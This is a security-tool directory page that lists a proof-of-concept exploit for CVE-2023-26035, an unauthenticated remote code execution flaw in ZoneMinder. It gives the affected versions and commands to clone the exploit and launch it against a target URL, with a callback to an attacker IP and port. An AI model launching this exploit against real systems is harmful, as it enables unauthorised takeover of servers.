Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-26035 — Unauthenticated RCE in ZoneMinder Snapshots - Poc Exploit | Kitploit
Tools/GitHubGitHub/rvzsec/cve-2023-26035
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubrvzsec/cve-2023-26035

CVE-2023-26035

Unauthenticated RCE in ZoneMinder Snapshots - Poc Exploit

View Repository
2222 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-26035

Unauthenticated RCE in ZoneMinder Snapshots - PoC Exploit

alt img

Description

ZoneMinder versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution due to missing authorization checks in the snapshot action.

Usage

root@kitploit:~
git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py
root@kitploit:~
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>

Requirements

root@kitploit:~
pip3 install beautifulsoup4

Credits

UnblvR discovered the vulnerability.

Download Tool